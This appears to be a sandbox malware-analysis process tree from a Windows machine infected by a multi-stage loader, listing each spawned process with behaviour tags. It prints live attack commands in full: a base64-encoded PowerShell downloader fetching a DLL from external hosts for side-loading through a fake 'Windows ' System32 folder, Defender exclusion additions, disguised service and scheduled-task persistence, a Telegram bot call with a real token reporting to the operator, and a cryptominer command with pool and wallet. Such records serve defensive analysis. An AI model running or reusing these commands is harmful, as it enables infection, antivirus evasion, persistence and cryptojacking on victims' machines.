C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TH4j0n3yiGSw.bat" "5⤵PID:3764
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5128
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1864
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"6⤵
- Checks computer location settings
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\txmeSsWzYSYt.bat" "7⤵PID:5044
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5568
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1008
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"8⤵
- Checks computer location settings
PID:2092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U534SfqX8nsF.bat" "9⤵PID:5656
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1072
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3764
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"10⤵
- Checks computer location settings
PID:5540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tVJhbw5WFusW.bat" "11⤵PID:5592
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:6024
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2148
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"12⤵
- Checks computer location settings
PID:5580 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1FRvylL6VCZp.bat" "13⤵PID:6036
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:1548
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3204
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"14⤵PID:2424
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\torque.exe"C:\Users\Admin\AppData\Local\Temp\Files\torque.exe"3⤵
- Executes dropped EXE
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3328 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"5⤵
- Executes dropped EXE
PID:5328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\app64.exe"C:\Users\Admin\AppData\Local\Temp\Files\app64.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ewrvuh.exe"C:\Users\Admin\AppData\Local\Temp\Files\ewrvuh.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
C:\Users\Admin\AppData\Local\Temp\Files\reverse.exe"C:\Users\Admin\AppData\Local\Temp\Files\reverse.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t.exe"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1500 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\2164521646.exeC:\Users\Admin\AppData\Local\Temp\2164521646.exe5⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:2708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:2452
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5380
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\303059389.exeC:\Users\Admin\AppData\Local\Temp\303059389.exe5⤵
- System Location Discovery: System Language Discovery
PID:6032 -
C:\Users\Admin\AppData\Local\Temp\1144032267.exeC:\Users\Admin\AppData\Local\Temp\1144032267.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5884
-
-
-
C:\Users\Admin\AppData\Local\Temp\99424430.exeC:\Users\Admin\AppData\Local\Temp\99424430.exe5⤵
- System Location Discovery: System Language Discovery
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\2424925859.exeC:\Users\Admin\AppData\Local\Temp\2424925859.exe5⤵
- System Location Discovery: System Language Discovery
PID:5704 -
C:\Users\Admin\AppData\Local\Temp\3588619235.exeC:\Users\Admin\AppData\Local\Temp\3588619235.exe6⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cc2.exe"C:\Users\Admin\AppData\Local\Temp\Files\cc2.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:5860 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"4⤵PID:4988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:844
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"4⤵PID:2096
-
C:\Windows\System32\usvcinsta64.exe"C:\Windows\System32\usvcinsta64.exe"5⤵PID:2768
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"6⤵PID:4008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5544
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"6⤵PID:5920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
-
C:\Windows\System32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:5160
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵PID:1232
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:5996 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵PID:5676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1184
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc create x149796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x149796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x149796.dat" /f && sc start x1497968⤵PID:840
-
C:\Windows\system32\sc.exesc create x149796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
PID:5952
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x149796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x149796.dat" /f9⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
PID:4872
-
-
C:\Windows\system32\sc.exesc start x1497969⤵
- Launches sc.exe
PID:2900
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵PID:5944
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵
- Loads dropped DLL
PID:1236 -
C:\Windows\System32\cmd.execmd.exe /c schtasks /delete /tn "console_zero" /f10⤵
- Indicator Removal: Clear Persistence
PID:1568 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "console_zero" /f11⤵PID:5276
-
-
-
C:\Windows\System32\cmd.execmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f10⤵PID:2584
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:6056
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"8⤵PID:5516
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak9⤵
- Delays execution with timeout.exe
PID:4888
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"6⤵PID:5244
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
PID:1744
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"4⤵PID:5200
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:2436
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"2⤵PID:4876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5320 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"4⤵PID:4916
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"4⤵PID:4216
-
C:\Windows\system32\xcopy.exexcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"5⤵PID:3852
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"4⤵PID:3564
-
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5624 -
C:\WINDOWS\SYSTEM32\cmd.execmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"5⤵PID:2824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"6⤵
- Command and Scripting Interpreter: PowerShell
PID:5580
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\bav64.exe"5⤵PID:4320
-
C:\Windows\System32\bav64.exe"C:\Windows\System32\bav64.exe"6⤵
- Deletes itself
PID:3536
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@UIJZGLAR: Already exists.'});"5⤵PID:1692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@UIJZGLAR: Already exists.'});"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5736
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"5⤵PID:5204
-
C:\Windows\System32\timeout.exetimeout /t 14 /nobreak6⤵
- Delays execution with timeout.exe
PID:1932
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"5⤵PID:2760
-
C:\Windows\System32\timeout.exetimeout /t 16 /nobreak6⤵
- Delays execution with timeout.exe
PID:5872
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6092
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:1992
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5888
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:5852
-
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1472 -ip 14721⤵PID:4876
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4432
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5048 -ip 50481⤵PID:2576
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2372
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1676
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5152
-
C:\Users\Admin\AppData\Roaming\Eszop.exe"C:\Users\Admin\AppData\Roaming\Eszop.exe"1⤵
- Executes dropped EXE
PID:6132
-
C:\ProgramData\svcsys"C:\ProgramData\svcsys"1⤵
- System Location Discovery: System Language Discovery
PID:5908
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k DcomLaunch1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:3136 -
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'2⤵PID:5512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4816
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'2⤵PID:5496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'G:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5636
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'2⤵PID:4172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'H:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4192
-
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "c:\windows\system32\winsvcf\x138062.exe"2⤵PID:3324
-
\??\c:\windows\system32\winsvcf\x138062.exe"c:\windows\system32\winsvcf\x138062.exe"3⤵PID:5960
-
C:\Windows\system32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"4⤵PID:5556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4508
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"4⤵PID:840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:680
-
-
-
C:\Windows\system32\cmd.execmd.exe /c timeout /t 5 /nobreak && move "c:\windows\system32\winsvcf\x138062.exe" "C:\Windows\System32" && start "" "C:\Windows\System32\x138062.exe"4⤵PID:5856
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak5⤵
- Delays execution with timeout.exe
PID:5196
-
-
C:\Windows\System32\x138062.exe"C:\Windows\System32\x138062.exe"5⤵PID:3416
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=502⤵PID:1708
-
\??\c:\windows\system32\winsvcf\x397670.datx397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=503⤵
- Suspicious use of FindShellTrayWindow
PID:1580
-
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "c:\windows\system32\crypti.exe"2⤵PID:2288
-
\??\c:\windows\system32\crypti.exe"c:\windows\system32\crypti.exe"3⤵PID:3716
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=502⤵PID:3076
-
\??\c:\windows\system32\winsvcf\x397670.datx397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=503⤵
- Suspicious use of FindShellTrayWindow
PID:5944
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x397670.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x946580 --max-cpu-usage=502⤵PID:5560
-
